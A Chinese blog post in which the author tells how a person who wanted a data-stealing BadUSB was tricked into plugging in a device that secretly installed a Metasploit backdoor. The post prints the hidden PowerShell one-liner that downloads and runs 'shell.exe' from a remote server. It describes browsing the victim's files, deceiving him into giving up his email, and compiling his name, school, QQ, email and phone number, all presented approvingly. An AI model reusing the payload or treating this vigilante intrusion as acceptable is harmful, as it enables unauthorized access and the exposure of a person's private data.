前言

某天下午,一个人加我找我做BadUSB

图片

问他做BadUsb用来干嘛,他说用来窃取资料(至于窃取啥我也不晓得)

图片

图片

通过看他朋友圈得知这逼是搞黑产的,我日,原来是黑产分子啊,必须盘他!

下面是我劝他改邪归正的过程,兄台,这可是你亲自找我的啊

社工过程

这边是用一个Badusb Leonardo,然后按照他要求,做了一个窃取D盘下的kao文件夹下的内容!

我跟他说具体原理就是使用Powershell给远端服务器上传文件!这逼还怕我骗他…

图片

完了到7点我做好了,你既然怕我骗你,那么我就骗你吧,来一个声东击西!其实我写的脚本就是打开cmd执行我写好的python脚本,用python脚本远程上传到服务器!还好那逼不懂,不然就露馅了…然后我就做好了发了个视频给他看

图片

图片

钱到手!我还白赚500块?

Metasploit生成远控

利用一个晚上的时间,我做了一个假的上传文件到服务器的BadUsb,具体是插上U盘,在他电脑里输入一大串代码(为了糊弄他)然后执行Powershell远程下载做好的免杀木马并执行(这才是真正目的),最后执行完会在cmd中打印出文件已上传到某某邮箱(为了让他相信)

Powershell原理如下:

1
powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://服务器地址/shell.exe','shell.exe');start-process shell.exe

具体BadUsb可以看我之前写的文章:

BadUSB-制作教程

具体演示效果可以看我B站发的视频:

利用MSF反弹Win7和Win10的Shell

目标主机已上线!

过了两天半,那小子收到我的U盘了,不得不说,顺丰真的快!

图片

小子!这可是你亲手插到你电脑的!

图片

然后翻了一下他的C盘没有找到什么,来到D盘找到了这b的犯罪记录:

图片

打开看了一下,有不少的信息!就不放出来了!

当我还在翻他的资料的时候,他好像怀疑我了

图片

接着我哄他说我那个邮箱密码登不上了,然后给他重新换一个填写他的邮箱;没想到他信了,

图片

估计是他太急吧,然后得到了他的邮箱:

1
2
邮箱:2754****@qq.com
他的qq:2754****

还好你信了啊,不然我都不知道咋接话了…

继续!msf上传一个远控方便翻文件,dos下翻东西我不太习惯…

经过一些信息收集,查到了他的资料:

1
2
3
4
5
张**
某高校学生
邮箱:2754****@qq.com
他的qq:2754****
手机号:155******12

以及他的小电影…

图片

兄台!电影我替你收走了!

本来想进行一波内网渗透的,结果发现这小子局域网里只有他一台主机..

算了算了,就到这吧!

末尾

这里插一句:做人留一线,日后好想见!每个人都有犯错的时候,给他一次机会也就是给自己一次机会,只要以后不做这个就好!

最后吧我找到的信息发给它,问你是不是张**然后直接跟他摊牌,这小子慌了;后来他跟我说,他是某高校的学生,还是211(无语…放着这么好的学校不好好上,搞个锤子的黑产)完事了解后,好在他没有吧这些东西放出去,最后我也是让他把那些资料全部删掉让他不要搞这玩意,最后妥协500块还给了他,然后他也同意我发这篇文章,这才让各位吃瓜群众看到这篇文章!

诶?我好像还亏了几十块和一个U盘?等等,小子!别走!吧邮费退给我啊!